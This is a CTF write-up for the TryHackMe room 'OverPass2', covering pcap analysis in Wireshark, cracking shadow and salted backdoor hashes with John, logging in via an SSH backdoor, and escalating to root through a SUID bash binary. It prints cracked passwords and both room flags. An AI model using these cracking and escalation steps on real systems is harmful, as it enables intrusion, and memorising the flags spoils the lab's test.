🎯
dmdhrumilmistry's gitbook
  • dmdhrumilmistry's gitbook
  • Blog
    • TryHackMe WriteUps
      • PickleRick
      • StartUp
      • Basic Malware RE
      • Bounty Hacker
      • Lazy Admin
      • Crack The Hash
      • Cyborg
      • OverPass
      • OverPass2
      • Agent T
      • Vulnerable API App
      • Git-Happens
      • Kiba
    • Vulnerabilities in Wild
      • Hiring Platform Exposing Thousands of User's Data
      • Security Analysis of the Indian Government's Student Assessment Platform
      • Exploiting S3 bucket misconfiguration to dump users emails
      • Getting Shell Access to ADB Exposed Smart Devices πŸ“²πŸ“ΊβŒš
      • Hacking Mumbai's Metro ChatBot and APIs for FUN πŸ€ΈπŸ»β€β™‚οΈ
      • Random Object Referencing IDs Still Aren't Safe in APIs πŸ’₯
      • Exploring Weird Account TakeOver (ATO) Vulnerabilities in APIs
    • Secure Software Development
      • Validating File Content Types to avoid Malicious File Hosting using ML Model
      • Securing Containers Supply Chain using Secure Base Layer Image
      • Automated API Tests in SDLC are Boon
Powered by GitBook
On this page
  • Target Details
  • Analyze pcap file
  • Crack Hashes from the WireShark packets
  • Hack Again

Was this helpful?

  1. Blog
  2. TryHackMe WriteUps

OverPass2

PreviousOverPassNextAgent T

Last updated 2 years ago

Was this helpful?

Target Details

  • IP: 10.10.145.49

Analyze pcap file

  • Download pcap file

  • Open with wireshark

    sudo wireshark

  • Follow TCP streams, you'll find all the answers to the questions

Crack Hashes from the WireShark packets

  • Download wordlist

  • Dump users from shadow file while analyzing packets in shadow_dump.txt file

  • User Shadow File Passwords using John

    john -w=/usr/share/wordlists/fasttrack.txt shadow_dump.txt

    user hashes are stored in shadow_dump.txt file

    Username
    Password

    bee

    secret12

    szymex

    abcd123

    muirland

    1qaz2wsx

    paradox

    secuirty3

  • Get hash from packet file and hard coded salt from ssh-backdoor GitHub repo

  • Store them in hash.txt file in hash:salt format

  • Crack using John

    john -w=/usr/share/wordlists/rockyou.txt hash.txt
    Username
    Password

    james

    november16

Hack Again

  • Login using Backdoor SSH, since we already know the password

    ssh -p 2222 james@10.10.145.49

  • Get User Flag

    cat /home/james/user.txt
# thm{d119b4fa8c497ddb0525f7ad200e6567}

  • On listing hidden files, we get .suid_bash which can be run as root

    /home/james/.suid_bash -p
.suid_bash-4.4#

  • We've rooted the machine

    .suid_bash-4.4# whoami
root

  • Get root flag

    .suid_bash-4.4# cat /root/root.txt
thm{d53b2684f169360bb9606c333873144d}
fasttrack